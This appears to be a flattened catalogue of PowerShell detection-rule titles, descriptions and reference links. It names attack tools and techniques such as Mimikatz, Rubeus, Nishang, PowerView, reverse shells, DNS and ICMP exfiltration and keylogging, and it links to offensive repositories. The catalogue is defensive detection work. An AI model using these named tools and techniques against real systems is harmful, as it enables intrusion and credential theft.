Active Directory Group Enumeration With Get-AdGroup |
Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Suspicious Get-ADReplAccount |
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.
These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
|
https://www.powershellgallery.com/packages/DSInternals, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount |
Automated Collection Bookmarks Using Get-ChildItem PowerShell |
Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
internal network resources such as servers, tools/dashboards, or other related infrastructure.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md |
Security Software Discovery Via Powershell Script |
Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes.
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell |
HackTool - Rubeus Execution - ScriptBlock |
Detects the execution of the hacktool Rubeus using specific command line flags |
https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus |
HackTool - WinPwn Execution - ScriptBlock |
Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
|
https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team |
PowerShell Hotfix Enumeration |
Detects calls to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes, often used in "enum" scripts by attackers |
https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1 |
PowerShell ICMP Exfiltration |
Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp |
Import PowerShell Modules From Suspicious Directories |
Detects powershell scripts that import modules from suspicious directories |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md |
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript |
Detects usage of the "Add-AppxPackage" cmdlet or its alias "Add-AppPackage" to install unsigned AppX packages |
https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122 |
Execute Invoke-command on Remote Host |
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4 |
Powershell DNSExfiltration |
DNSExfiltrator allows for transferring (exfiltrating) a file over a DNS request covert channel |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh, https://github.com/Arno0x/DNSExfiltrator |
Invoke-Obfuscation CLIP+ Launcher - PowerShell |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell |
Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the referenced code block |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - Powershell |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - PowerShell |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - Powershell |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - Powershell |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - PowerShell |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - PowerShell |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Powershell Keylogging |
Adversaries may log user keystrokes to intercept credentials as the user types them. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1 |
Powershell LocalAccount Manipulation |
Adversaries may manipulate accounts to maintain access to victim systems.
Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1 |
Suspicious PowerShell Mailbox Export to Share - PS |
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations |
https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Malicious PowerShell Commandlets - ScriptBlock |
Detects Commandlet names from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
Live Memory Dump Using Powershell |
Detects usage of a PowerShell command to dump the live memory of a Windows machine |
https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps |
Malicious PowerShell Keywords |
Detects keywords from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921 |
Modify Group Policy Settings - ScriptBlockLogging |
Detects malicious GPO modifications, which can be used to implement many other malicious behaviors. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md |
Powershell MsXml COM Object |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt, https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85), https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html |
Malicious Nishang PowerShell Commandlets |
Detects Commandlet names and arguments from the Nishang exploitation framework |
https://github.com/samratashok/nishang |
NTFS Alternate Data Stream |
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. |
https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md |
Code Executed Via Office Add-in XLL File |
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.
Office add-ins can be used to add functionality to Office programs
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md |
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock |
Detects the execution of PowerShell scripts with calls to the "Start-NetEventSession" cmdlet, which allows an attacker to start event and packet capture for a network event session.
Adversaries may attempt to capture network traffic to gather information over the course of an operation.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
|
https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing, https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md, https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13 |
Potential Invoke-Mimikatz PowerShell Script |
Detects the Invoke-Mimikatz PowerShell script and the like. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. |
https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script |
PowerShell Web Access Installation - PsScript |
Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse |
https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41 |
PowerView PowerShell Cmdlets - ScriptBlock |
Detects Cmdlet names from PowerView of the PowerSploit exploitation framework. |
https://powersploit.readthedocs.io/en/stable/Recon/README, https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon, https://thedfirreport.com/2020/10/08/ryuks-return, https://adsecurity.org/?p=2277 |
PowerShell Credential Prompt |
Detects PowerShell calling a credential prompt |
https://twitter.com/JohnLaTwC/status/850381440629981184, https://t.co/ezOTGy1a1G |
PSAsyncShell - Asynchronous TCP Reverse Shell |
Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell |
https://github.com/JoelGMSec/PSAsyncShell |
PowerShell PSAttack |
Detects the use of PSAttack PowerShell hack tool |
https://adsecurity.org/?p=2921 |
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock |
Detects PowerShell module creation where the module contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary, which is known to be vulnerable to module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
PowerShell Remote Session Creation |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4 |
PowerShell Script With File Hostname Resolving Capabilities |
Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries. |
https://www.fortypoundhead.com/showcontent.asp?artid=24022, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Request A Single Ticket via PowerShell |
Utilizes native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.
This behavior is typically used during a Kerberos or silver ticket attack.
A successful execution will output the SPNs for the endpoint in question.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell |
Root Certificate Installed - PowerShell |
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
Suspicious Invoke-Item From Mount-DiskImage |
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps |
PowerShell Script With File Upload Capabilities |
Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md, https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4 |
PowerShell Script Change Permission Via Set-Acl - PsScript |
Detects PowerShell scripts that set the ACL of a file or a folder |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md |
Powershell Sensitive File Discovery |
Detects adversaries enumerating sensitive files |
https://twitter.com/malmoeb/status/1570814999370801158 |
PowerShell Set-Acl On Windows Folder - PsScript |
Detects PowerShell scripts that set the ACL of a file in the Windows folder |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1 |
Change PowerShell Policies to an Insecure Level - PowerShell |
Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet. |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604 |
PowerShell ShellCode |
Detects Base64 encoded Shellcode |
https://twitter.com/cyb3rops/status/1063072865992523776 |
Malicious ShellIntel PowerShell Commandlets |
Detects Commandlet names from ShellIntel exploitation scripts. |
https://github.com/Shellntel/scripts/ |
Detected Windows Software Discovery - PowerShell |
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts |
Powershell Store File In Alternate Data Stream |
Storing files in an Alternate Data Stream (ADS), similar to Astaroth malware. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md |
Potential Persistence Via Security Descriptors - ScriptBlock |
Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. |
https://github.com/HarmJ0y/DAMP |
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock |
Adversaries may attempt to find domain-level groups and permission settings.
The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Potential PowerShell Obfuscation Using Character Join |
Detects specific techniques often seen used inside of PowerShell scripts to obfuscate alias creation |
Internal Research |
Suspicious Eventlog Clear |
Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs |
https://twitter.com/oroneequalsone/status/1568432028361830402, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html |
Powershell Directory Enumeration |
Detects technique used by MAZE ransomware to enumerate directories using Powershell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md, https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents |
Suspicious PowerShell Download - Powershell Script |
Detects suspicious PowerShell download command |
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0 |
Powershell Execute Batch Script |
Adversaries may abuse the Windows command shell for execution.
The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script |
Troubleshooting Pack Cmdlet Execution |
Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS) |
https://twitter.com/nas_bench/status/1537919885031772161, https://lolbas-project.github.io/lolbas/Binaries/Msdt/ |
Extracting Information with PowerShell |
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.
These can be files created by users to store their own credentials, shared credential stores for a group of individuals,
configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
PowerShell Get-Process LSASS in ScriptBlock |
Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity |
https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211 |
Suspicious GetTypeFromCLSID ShellExecute |
Detects suspicious PowerShell code that executes COM objects |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object |
Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy |
Detects PowerShell activity in which Get-AdDefaultDomainPasswordPolicy is used to get the default password policy for an Active Directory domain. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy, https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps |
Suspicious PowerShell Get Current User |
Detects the use of PowerShell to identify the currently logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script |
Suspicious GPO Discovery With Get-GPO |
Detects use of Get-GPO to get one GPO or all the GPOs in a domain. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps |
Suspicious Process Discovery With Get-Process |
Get the processes that are running on the local computer. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4 |
Suspicious Hyper-V Cmdlets |
Adversaries may carry out malicious operations using a virtual instance to avoid detection |
https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine |
Suspicious PowerShell Invocations - Generic |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious PowerShell Invocations - Specific |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious IO.FileStream |
Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md |
Change User Agents with WebRequest |
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols |
Potential Keylogger Activity |
Detects PowerShell scripts that contain references to keystroke capturing functions |
https://twitter.com/ScumBots/status/1610626724257046529, https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content, https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content, https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0 |
Suspicious Get Local Groups Information - PowerShell |
Adversaries may attempt to find local system groups and permission settings.
The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Potential Suspicious PowerShell Keywords |
Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework |
https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1, https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1, https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7 |
Powershell Local Email Collection |
Adversaries may target user email on local systems to collect sensitive information.
Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md |
PowerShell Deleted Mounted Share |
Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md |
Suspicious Mount-DiskImage |
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps |
Suspicious Connection to Remote Account |
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.
Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos |
Suspicious New-PSDrive to Admin Share |
Adversaries may interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2 |
Suspicious TCP Tunnel Via PowerShell Script |
Detects PowerShell scripts that create sockets/listeners, which could be indicative of tunneling activity |
https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1 |
Recon Information for Export with PowerShell |
Once established within a system or network, an adversary may use automated techniques for collecting internal data |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md |
Remove Account From Domain Admin Group |
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.
Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group |
Suspicious Service DACL Modification Via Set-Service Cmdlet - PS |
Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7) |
https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 |
Suspicious Get Information for SMB Share |
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as
a precursor for Collection and to identify potential systems of interest for Lateral Movement.
Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Potential PowerShell Obfuscation Using Alias Cmdlets |
Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts |
https://github.com/1337Rin/Swag-PSO |
Suspicious SSL Connection |
Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2, https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 |
Suspicious Start-Process PassThru |
Detects PowerShell usage of the PassThru option to start a process in the background |
